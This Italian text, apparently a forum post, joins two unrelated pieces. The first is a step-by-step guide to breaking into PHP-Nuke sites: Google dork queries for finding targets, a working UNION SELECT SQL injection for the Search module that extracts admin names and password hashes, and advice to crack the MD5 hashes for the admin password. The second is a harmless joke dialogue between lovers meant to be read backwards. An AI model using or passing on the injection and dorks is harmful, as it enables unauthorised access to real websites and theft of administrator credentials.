1) Come al solito vi ripeto che dobbiamo avere a portata di mano il sito in PHP-Nuke.php
2) Per trovarlo più semplicemente su google inseriremo le seguenti 3 QUERY:
“Powered by PhpNuke”
“allinurl:phpnuke/modules.php?name=Search”
“allinurl:html/modules.php?name=Search”
“inurl:modules.php?name=Search”
3) Una volta trovato, andiamo sul modulo del Search. (se per caso non lo trovate, basta scrivere sul link
www.sito.it/phpnuke/modules.php?name=Search)
4) Una volta li, inseriamo il seguente codice:
p0hh0nsee%’) UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*
5) Una volta inserito, fate “Cerca”
6) Se la cosa funziona vi darà un hash in md5, che dovrete decriptare (consiglio il programma Cain & Abel reperibile sul sito
http://www.oxid.it/)
7) Una volta decriptato l’hash, avrete la password dell’admin.
-------------------------------------------------------------------------------------------------------------------------------
lei: Ciao !
Lui: finalmente! da quanto tempo aspettavo questo momento!
lei: vuoi che vada via?
lui: NO! Come ti viene in mente? Solo a pensarci, rabbrividisco!
lei: Mi ami?
lui: Certamente! a tutte le ore del giorno e della notte!
lei: Mi hai mai tradito?
lui: NO! MAI! perché me lo chiedi?
lei: vuoi baciarmi?
lui: Si, ogni volta che ne ho l'occasione!
lei: Saresti mai capace di picchiarmi?
lui: Sei impazzita? Lo sai come sono io!
lei: Posso fidarmi di te?
lui: Si!
lei: Tesoro ...
DIECI ANNI DOPO:
basta leggere il testo dal basso in alto...
